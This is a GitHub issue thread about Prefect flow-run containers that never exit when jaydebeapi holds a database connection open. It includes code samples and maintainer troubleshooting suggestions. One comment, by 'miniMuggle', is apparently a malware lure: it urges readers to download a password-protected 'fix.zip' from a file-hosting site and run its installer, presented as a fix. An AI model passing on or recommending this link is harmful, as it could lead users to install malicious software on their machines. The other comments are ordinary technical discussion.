### ISSUE TITLE
Flow run containers never exit when using `jaydebeapi`

### ISSUE THREAD

**Issue by kevingrismore** [PrefectHQ/prefect#15098]
### Bug summary

Flow run containers never exit when using `jaydebeapi`, even when manually closing and deleting connections. Network information on containers indicate the connection is still open.

```python
import gc

import jaydebeapi
from prefect import flow
from prefect.logging import get_run_logger


@flow
def sync_object(table):
    logger = get_run_logger()

    user = None
    password = None
    driver = None
    jar = None
    query = """select * from some_table;"""

    connection = None
    cursor = None
    results = []

    try:
        connection = jaydebeapi.connect(driver, url, [user, password], jar)
        cursor = connection.cursor()

        cursor.execute(query)
        columns = [column[0] for column in cursor.description]
        results = [dict(zip(columns, row)) for row in cursor.fetchall()]

    except Exception as e:
        logger.error(f"Error running query: {e}")

    finally:
        if cursor:
            try:
                cursor.close()
                del cursor
            except Exception as e:
                logger.error(f"Failed to close cursor: {e}")

        if connection:
            try:
                connection.close()
                del connection
            except Exception as e:
                logger.error(f"Failed to close connection: {e}")

        # Force garbage collection to clean up connection
        gc.collect()

    return results
```

### Version info (`prefect version` output)

```Text
Version:             2.19.2
API version:         0.8.4
Python version:      3.11.5
Git commit:          e42a3971
Built:               Thu, May 23, 2024 2:45 PM
OS/Arch:             darwin/arm64
Profile:             default
Server type:         cloud
```

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cicdw** [comment]
@kevingrismore could you try using the connection and cursor as context managers and see if that resolves it? 

```python
import gc

import jaydebeapi
from prefect import flow
from prefect.logging import get_run_logger


@flow
def sync_object(table):
    logger = get_run_logger()

    user = None
    password = None
    driver = None
    jar = None
    query = """select * from some_table;"""

    connection = None
    cursor = None
    results = []

    try:
        with jaydebeapi.connect(driver, url, [user, password], jar) as connection:
            with connection.cursor() as cursor:
                cursor.execute(query)
                columns = [column[0] for column in cursor.description]
                results = [dict(zip(columns, row)) for row in cursor.fetchall()]

    except Exception as e:
        logger.error(f"Error running query: {e}")

        # Force garbage collection to clean up connection
        gc.collect()

    return results
```

**Comment by johnkangw** [comment]
@cicdw I've tried and it does not fix the issue...

**Comment by cicdw** [comment]
Hm, I think this is going to be better solved by `jaydebeapi` - it seems like you'll need to play with the configuration of the JVM to make sure that all threads are properly daemonized (for example, see [this issue comment](https://github.com/baztian/jaydebeapi/issues/180#issuecomment-763276396) that describes similar hanging behavior).

One other thought is to set `PREFECT_EXPERIMENTAL_ENABLE_NEW_ENGINE=true`; this will approximate the behavior of the 3.0 engine, which might be more likely to run this flow in the main thread and potentially avoid the bug in `jaydebeapi`.

**Comment by johnkangw** [comment]
@cicdw @kevingrismore I was able to switch over to querying using pyodbc instead. One alternative method might be to use jpype (https://jpype.readthedocs.io/en/latest/dbapi2.html), but I have not tried that yet.

**Comment by cicdw** [comment]
Thanks for sharing @johnkangw - I'm going to close this issue given there's not much we can do on the Prefect side right now, but if others run into similar things we can always re-open if necessary.

**Comment by johnkangw** [comment]
@cicdw Is there a way for us to initiate the closing of the docker container that we spin up to run a prefect flow? One workaround would be to be able to ensure the docker container closes when the flow completes even if a database connection is still open.

**Comment by cicdw** [comment]
We might be able to do something like that, but I think that's more of a use-case specific bandaid that I'd probably only want to consider if this problem is more widespread.

**Comment by johnkangw** [comment]
@cicdw Thanks for the heads up. This probably is not the only instance where we need to initiate a docker container shutdown after a prefect flow is complete? Maybe it is...

**Comment by cicdw** [comment]
Yea, the only reason you'd need to do that is because you can't properly clean up the Python process - otherwise the process naturally exits.  I suppose you could try `sys.exit(0)` instead of `gc.collect()` and see if that works, but that's going to also prevent Prefect itself from sending relevant things to the API (e.g., logs and states).
